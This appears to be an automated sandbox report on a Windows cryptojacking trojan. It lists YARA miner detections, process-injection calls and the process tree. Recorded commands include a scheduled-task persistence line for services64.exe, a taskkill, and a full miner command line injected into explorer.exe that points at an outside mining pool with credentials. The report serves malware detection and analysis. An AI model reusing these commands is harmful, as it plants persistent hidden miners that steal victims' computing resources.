                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D58 NtAllocateVirtualMemory,10_2_00401D58
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D18 NtWriteVirtualMemory,10_2_00401D18
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_004019D8 NtCreateThreadEx,10_2_004019D8
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401D98 NtProtectVirtualMemory,10_2_00401D98
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeCode function: 10_2_00401C98 NtClose,10_2_00401C98
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA3625A30E NtUnmapViewOfSection,17_2_00007FFA3625A30E
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626A3EE NtUnmapViewOfSection,21_2_00007FFA3626A3EE
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D58 NtAllocateVirtualMemory,22_2_00401D58
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D18 NtWriteVirtualMemory,22_2_00401D18
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_004019D8 NtCreateThreadEx,22_2_004019D8
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401D98 NtProtectVirtualMemory,22_2_00401D98
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 22_2_00401C98 NtClose,22_2_00401C98
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655959061.000000000370C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmpBinary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: sistem.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00044194799
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00537109375
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.00051229508
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.00051229508
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.00054824561
                  Source: sistem.exe.1.drStatic PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.drStatic PE information: Section: .rsrc ZLIB complexity 0.995659722222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeVirustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
                  Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6040)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\sistem.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01
                  Source: explorer.exeString found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exeString found in binary or memory: set-addPolicy
                  Source: explorer.exeString found in binary or memory: id-cmc-addExtensions
                  Source: explorer.exeString found in binary or memory: set-addPolicy
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic file information: File size 3609088 > 1048576
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x2f2e00
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C3665 push ss; retf 0_3_026C3658
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026C36AF push ss; retf 0_3_026C3658
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BC283 push ebp; iretd 0_3_026BC2D7
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BECAF pushfd ; ret 0_3_026BECD9
